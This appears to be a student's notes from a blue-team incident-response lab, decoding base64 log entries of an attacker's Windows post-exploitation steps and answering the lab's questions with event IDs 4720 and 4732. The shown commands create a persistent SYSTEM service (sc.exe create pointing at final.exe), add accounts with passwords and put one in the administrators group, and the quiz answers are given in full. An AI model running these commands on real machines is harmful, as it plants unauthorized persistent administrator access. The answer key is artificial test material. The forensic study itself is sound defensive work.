b2JhbCBvYmplY3RzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlVHJ1c3RlZENyZWRNYW5BY2Nlc3NQcml2aWxlZ2UgICAgICAgICAgIEFjY2VzcyBDcmVkZW50aWFsIE1hbmFnZXIgYXMgYSB0cnVzdGVkIGNhbGxlciAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZVJlbGFiZWxQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgICBNb2RpZnkgYW4gb2JqZWN0IGxhYmVsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VJbmNyZWFzZVdvcmtpbmdTZXRQcml2aWxlZ2UgICAgICAgICAgICAgSW5jcmVhc2UgYSBwcm9jZXNzIHdvcmtpbmcgc2V0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlVGltZVpvbmVQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgIENoYW5nZSB0aGUgdGltZSB6b25lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUNyZWF0ZVN5bWJvbGljTGlua1ByaXZpbGVnZSAgICAgICAgICAgICBDcmVhdGUgc3ltYm9saWMgbGlua3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VEZWxlZ2F0ZVNlc3Npb25Vc2VySW1wZXJzb25hdGVQcml2aWxlZ2UgT2J0YWluIGFuIGltcGVyc29uYXRpb24gdG9rZW4gZm9yIGFub3RoZXIgdXNlciBpbiB0aGUgc2FtZSBzZXNzaW9uIEVuYWJsZWQNCg==

whoami /priv - 
PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

c2MuZXhlIFxcVEVNUEVTVCBjcmVhdGUgVGVtcGVzdFVwZGF0ZSBiaW5wYXRoPSBDOlxQcm9ncmFtRGF0YVxmaW5hbC5leGUgc3RhcnQ9IGF1dG8gLSBbU0NdIENyZWF0ZVNlcnZpY2UgRkFJTEVEIDEwNzM6DQoNClRoZSBzcGVjaWZpZWQgc2VydmljZSBhbHJlYWR5IGV4aXN0cy4NCg0K

sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService FAILED 1073:

The specified service already exists.

c2MuZXhlIFxcVEVNUEVTVCBjcmVhdGUgVGVtcGVzdFVwZGF0ZTIgYmlucGF0aD0gQzpcUHJvZ3JhbURhdGFcZmluYWwuZXhlIHN0YXJ0PSBhdXRvIC0gW1NDXSBDcmVhdGVTZXJ2aWNlIFNVQ0NFU1MNCg==

sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService SUCCESS

c2MuZXhlIHFjIFRlbXBlc3RVcGRhdGUyIC0gW1NDXSBRdWVyeVNlcnZpY2VDb25maWcgU1VDQ0VTUw0KDQpTRVJWSUNFX05BTUU6IFRlbXBlc3RVcGRhdGUyDQogICAgICAgIFRZUEUgICAgICAgICAgICAgICA6IDEwICBXSU4zMl9PV05fUFJPQ0VTUyANCiAgICAgICAgU1RBUlRfVFlQRSAgICAgICAgIDogMiAgIEFVVE9fU1RBUlQNCiAgICAgICAgRVJST1JfQ09OVFJPTCAgICAgIDogMSAgIE5PUk1BTA0KICAgICAgICBCSU5BUllfUEFUSF9OQU1FICAgOiBDOlxQcm9ncmFtRGF0YVxmaW5hbC5leGUNCiAgICAgICAgTE9BRF9PUkRFUl9HUk9VUCAgIDogDQogICAgICAgIFRBRyAgICAgICAgICAgICAgICA6IDANCiAgICAgICAgRElTUExBWV9OQU1FICAgICAgIDogVGVtcGVzdFVwZGF0ZTINCiAgICAgICAgREVQRU5ERU5DSUVTICAgICAgIDogDQogICAgICAgIFNFUlZJQ0VfU1RBUlRfTkFNRSA6IExvY2FsU3lzdGVtDQo=

sc.exe qc TempestUpdate2 - [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TempestUpdate2
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\ProgramData\final.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : TempestUpdate2
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

bmV0IHVzZXIgL2FkZCBzaHVuYSBwcmluY2VzcyAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net user /add shuna princess - The command completed successfully.

bmV0IHVzZXIgL2FkZCBzaGlvbiBtNHN0M3JjaDNmISAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net user /add shion m4st3rch3f! - The command completed successfully.

and now he can create users :)

bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgc2hpb24gICAgICAgICAgICAgICAgICAgIA0Kc2h1bmEgICAgICAgICAgICAgICAgICAgIFdEQUdVdGlsaXR5QWNjb3VudCAgICAgICANClRoZSBjb21tYW5kIGNvbXBsZXRlZCB3aXRoIG9uZSBvciBtb3JlIGVycm9ycy4NCg0K

net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   shion                    
shuna                    WDAGUtilityAccount       
The command completed with one or more errors.

confirmed

bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgL2FkZCBzaGlvbiAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net localgroup administrators /add shion - The command completed successfully.

bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgLSBBbGlhcyBuYW1lICAgICBhZG1pbmlzdHJhdG9ycw0KQ29tbWVudCAgICAgICAgQWRtaW5pc3RyYXRvcnMgaGF2ZSBjb21wbGV0ZSBhbmQgdW5yZXN0cmljdGVkIGFjY2VzcyB0byB0aGUgY29tcHV0ZXIvZG9tYWluDQoNCk1lbWJlcnMNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvcg0KcmltdXJ1DQpzaGlvbg0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4NCg0K

net localgroup administrators - Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.

so shion 🤔 

The event ID that indicates the account creation activity in Windows event logs is 4720. This event is logged in the Security event log whenever a new user account is created on the system. The event includes information about the user account, such as the account name, security identifier (SID), and group memberships. It also includes information about the computer or domain where the account was created and the user who performed the account creation action.

The event ID that indicates the addition of a user to a sensitive local group in Windows event logs is 4732. This event is logged in the Security event log whenever a user account is added to a security-sensitive local group on the computer. The event includes information about the user account, such as the account name and security identifier (SID), as well as information about the group that the user was added to. This information can be used to identify potential security risks, such as unauthorized access to sensitive resources or privilege escalation.

Upon achieving SYSTEM access, the attacker then created two users. What are the account names?

Format: Answer in alphabetical order - comma delimited

shion,shuna

Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?

/add

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?

External research needed. Find out what event ID logs successful account creation.

4720

The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?

net localgroup administrators /add shion

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?

External research needed. Find out what event ID logs successful addition to a local group.

4732

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?

Format: Remove the double quotes from the log.

*"C:\Windows\system32\sc.exe" \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto*

[[Intro to Offensive Security]]

PreviousBlueTeam NexthackerNote

Last updated 2 years ago

Was this helpful?